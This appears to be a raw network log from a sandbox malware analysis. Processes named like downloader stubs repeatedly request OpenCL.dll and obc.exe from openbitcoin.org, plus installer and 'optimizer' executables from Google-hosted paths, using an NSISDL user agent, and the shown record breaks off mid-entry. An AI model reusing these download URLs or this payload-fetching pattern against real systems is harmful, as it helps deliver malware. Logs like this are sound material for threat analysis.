    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:20 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:20 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:20 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:24 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:23 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:23 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:24 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:24 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:24 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:24 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:24 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:24 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:24 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:24 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:25 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:25 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:25 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:25 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:25 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:25 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:26 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:26 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:26 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:26 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:26 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:26 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:26 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:26 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:27 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:27 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:27 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:27 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:27 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 50
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 50
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:28 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 53
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:28 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 51
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
